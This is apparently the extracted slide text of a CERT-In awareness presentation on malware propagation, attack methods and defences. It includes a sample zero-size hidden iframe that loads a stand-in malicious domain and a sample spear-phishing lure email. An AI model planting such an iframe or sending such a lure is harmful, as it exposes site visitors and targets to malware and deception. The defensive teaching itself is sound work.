malware propagation & attacks trends

Malware propagation & attacks trends

Aroma Gupta, Bhavya Jain (Bhupendra Singh Awasya, Scientist ‘C’, [GCIH, GREM])

Indian Computer Emergency Response Team (CERT-In)

Ministry of Communications and Information Technology Department of Information Technology

Government of India

Topics of Discussion • Introduction :

– Security Definitions – Malware

• Malware Propagation Methods • Attack Methodology

– Drive-by-download – Watering hole attack – Client side/Targeted attacks/RATS

– DNS Changer Malware – Rogue software – Web Attack Toolkits – Mobile malware threats

• Actions and countermeasures

Security Related Concepts

National level

• Cyber Terrorism • Attacks on Critical

Infrastructure • Web defacement • Website intrusion and

malware propagation • Malicious Code • Scanning and probing • Denial of Service &

Distributed Denial of Service

• Cyber espionage

Organisational level

• Website intrusion/ defacement

• Domain stalking • Malicious Code • Scanning and probing • Denial of Service &

Distributed Denial of Service

• Targeted attacks • Phishing • Data theft • Insider threats • Financial frauds

Individual level

• Social Engineering • Email hacking & misuse • Identity theft & phishing • Financial scams • Abuse through emails • Abuse through Social

Networking sites • Laptop theft

Cyber threats

Malware(“Mal”icious+Soft”ware”) • It refers to the various intrusive software that are capable of

gaining unauthorized access thereby leading to data/system compromise.

Malware Propagation Malware propagation refer to the method by which malware is transmitted to an information system, platform or device it seeks to infect. Propagation Methods:

More Propagation Tactics

Source: Microsoft

Mobile Malware Evolution

Mobile OS market share

Mobile Malware Threats • For Financial Gain/Loss Unnecessary calls/SMS/MMS Send & sell private information • Cause phones to work slowly or crash • Wipe out contact books or other

information on the phone • Remote control of the phone • Install false applications

Mobile Threats

Ad Jacking

SMS Trojan

Android Malware Count

Mobile Malware Count

Behaviour Based Platform Based

Drive-by-download

It includes: • User clicks but unaware of the consequences: e.g. Install Flash Plugin.

• User unaware of the download: eg. Installation of ad-wares while browsing.

Download of Malicious content from the internet without the user intervention

1.2 Infect a legitimate website

1.1 Create a Malicious website

Legitimate website

Malicious website

Attacker

2 User request legitimate website

3 Website response including malicious code

4 User’s browser request for content from malicious website

5 Malicious website successfully delivers malware/virus

Legitimate user’s system

Req.

Resp.

Connect Attacker

Drive-by-download strategy

• hxxp://legitimate.site/css/indexs.php

Reason: Embedded Iframe in legitimate Site <iframe src=www.maliciousdomain.com width=0 height=0 ></iframe>

Example:

Quick Response Code (QR Code)

Use your tablet or phone camera to scan this image to visit our website!

• Visit our Website @

!! What if Setup by Attacker- Social-Engineer Toolkit (SET) for Launching Attack!!

Rouge antivirus "AVG -Antivirus 2011" shortcut icon:

Rogue Software

Social Networking-Spreading rogue antivirus

Cryptolocker-Top Ransomeware 2013 • Encrypts files-local drives, shared network drives, USB drives,

external hard drives, network file shares and even some cloud storage drives

• Server generates a 2048-bit RSA key pair, and sends the public key back to the infected computer

• Demands Ransom amount against decryption key.

Recently Fireeye.com has provided a means for decrypting your file encrypted using cryptolocker.

• http://www.fireeye.com/blog/corporate/2014/08/your-locker-of-information-for-cryptolocker-decryption.html

• https://www.DecryptCryptoLocker.com Note : Keep regular backups of your files

BackOff POS malware:

• Belongs to the family of malware targeting Point of sale(POS) systems to steals customers payment cards data i.e. track1 and track2 information containing user name, password, CVV number etc.

• Propagation Mechanism: Scanning and brute forcing systems running Remote desktop Applications such as Microsoft Remote desktop, apple remote desktop, Splashtop2 etc.

• OS Targeted: Microsoft Windows

• Communicates and execute commands received from Command and Control server such as Update, Terminate ,Uninstall, Download and Run, Upload KeyLogs etc .

• Sends exfiltrated data to the C2 sever. • Injects malicious stub into windows "Explorer.exe" for persistence, in case malicious file crashes or

stopped forcefully.

• C2 Communication:

Key logging Routine

Password for the RC4 algorithm is MD5 of string generated by a concatenation of the ‘id’ parameter, a static string of ‘jhgtsd7fjmytkr’, and the ‘ui’ parameter.

Stolen data encrypted using RC4 algorithm and

then encoded using Base64

ID and UI parameter used in

RC4 password

Watering Hole Attack Refers to technique to target a particular organization by compromising websites that the targets use to visit The attack consists of following phases:

– Identify target – Observe the websites the group often uses. Eg. – Infect one or more of these websites with malware. – Eventually, some member of the targeted group will get

infected.

Recent vulnerability used in watering hole attacks: IE zero day Vulnerability(CVE-2013-1347)

Working

• One of the most prevalent technique of targeted attacks

Once the malware/virus is planted on user's computer, a remote attacker/hacker can: - Access - credential stealing - Use as a launching pad for further attacks - Install other malwares/viruses Can Lead to complete Compromise of the system.

Botnet Trends- INDIA 2013

Targeted Attacks Refers to the attack technique where in attacker

targets either an individual or an organization. It includes: • Profiling of an individual or organization • Gathering information via social engineering

Purpose: Stealing specific information.

• URL shortening services like, for hiding the actual URL http://tinyurl.com/

http://bit.ly/ eg : shortened URL for “www.cert-in.org.in” is “http://bit.ly/1wvvBLU”

-Malicious Email attachments (PDF, DOC, XLS, SWF, PPT) Mostly exploited : CVE-2010-3333, CVE-2012-0158, cve-2009-4324

- Extension hiding techniques

Techniques of Targeted attacks

Targeted attacks - example

From: Sr Manager [mailto:employee@abc.com] Sent: Tuesday, 19 January, 2010 5:14 PM To: employee@abc.com bcc: Target1@abc.com, target2@abc.com Subject: Urgent document for agenda items for the coming meeting Dear Mr. (Target) I am attaching the agenda items for a probable meeting for discussing briefing points for the board meeting. For confidentiality reasons the attached file is password protected, the password for the attached file is:- “abc123”. Please have a look and send your comments and input material to me ASAP. Regards ABC

URL Shortening & Extension Hiding Technique

Note: The URL points to an executable, which is pretending video file (.wmv) with actual file extension as (.scr)

Link in E-mail:

Extension Hiding Technique

Upon UNZIP, .docx (word document) file is extracted, which is actually a SCR file as shown below:

Note: The dropped file is pretending to be a Microsoft Office Word

Document file but actually it is a self extracting archive file with extension as “.scr” (screen saver file)

Extension shown as “docx” -a word document Extension

Self Extracting Archive Icon Actual Extension is “.scr”

---screen saver file

Most targeted OS and Applications 2013

Source: GFI

How attacker can change the world: Discussion on “DNS

Changer Malware”: operation click ghost

• 4 million computers infected.

• Routers with default username and password are

exploited

• The malware hijacks DNS on infected system

9

Attack Toolkits

Attack toolkits are malicious toolkits containing various exploits bundled

into a single package

Working of WEB Attack Toolkit

Attack Toolkit - MPack

Securing against drive-by-download attacks:

• Use of Web Filtering software: • Enable smart screen Filters ( available only in Internet

Explorer) • Use Web browser plugins:

– Eg. Noscript, Adblocker plugins of firefox

• Using different and secure Web Browsers: – Eg. Mozilla firefox with preinstalled Google safe browsing feature.

Enable Smart Screen Filter (IE)

This feature is to block fake or malicious sites from distributing questionable or download malicious software to the victim's system

Browser Plug-in • Noscript (Firefox Plug-in): Will allow you to run JavaScript ,Java and flash only on

trusted websites that is chosen by the user. Browser Settings options plugins search for “Noscript”

Install-> restart browser

• Adblock (Firefox Plug-in): Prevents any malicious adds from being executed. Browser Settings options plugins search for “adblock”

plugin install restart browser. Note: many more add-ons and Plug-ins are available for IE, chrome and

Firefox.

Configuring Google Chrome Goto Chrome Settings show advance settings Privacy

Content Settings

Disable JavaScript

Enable phishing and malware protection

Keep Google updated

Configure EMET(Enhanced Mitigation and Experienced Toolkit)

Provides end node protection against zero day vulnerabilities and blocks and prevents memory based attack approaches.

Configuring Microsoft Office Word • Disable ActiveX controls: Click Office Button-> Word Options -> Trust center-> Trust Center

Settings-> ActiveX Settings

• Disable Macros Office Button-> Word Options -> Trust center-> Trust Center

Settings-> Macros Settings

• Open the Microsoft Office word documents in Protected view

Office Button-> Word Options -> Trust center-> Trust Center Settings->Protected View

Configuring Adobe • Goto Edit Preferences

Actions at organisational level • Security policies and procedures • CSIRT/CISO/Administrator/Users • Multi-layered defense mechanism

– Network behavior analysis – Perimeter Defense – Security Information and Event Management – Database Activity Monitoring

• Updated/Patched applications • Host based Intrusion Prevention System • Pre defined procedures for information sharing • Authentication & authorisation to secure information and prevent data

leakage • Authentication of emails (Digital signatures) • Auditing and Pentest • User awareness

Actions at User/Organisation level • Perform scanning on computer for possible infection with the removal tools

mentioned below. • Conduct routine backups of important files, keeping the backups stored offline. • Disconnect the infected system from wireless or wired networks to prevent the

malware from further encrypting files stored over network shares • Exercise caution while visiting links within emails received from untrusted users

or unexpectedly received from trusted users. • Do not download and open attachments in emails received from untrusted users

or unexpectedly received from trusted users • Exercise caution while visiting links to web pages. • Protect yourself against social engineering attacks. • Do not visit untrusted websites. • Enable firewall at desktop and gateway level and disable ports that are not

required. • Avoid downloading pirated software. • Keep up-to-date patches and fixes on the operating system and application

softwares • Keep up-to-date antivirus and antispyware signatures at desktop and gateway

level.

Thank you

Incident Response Helpdesk

Phone: 1800 11 4949

FAX: 1800 11 6969

e-mail: incident@cert-in.org.in

http://www.cert-in.org.in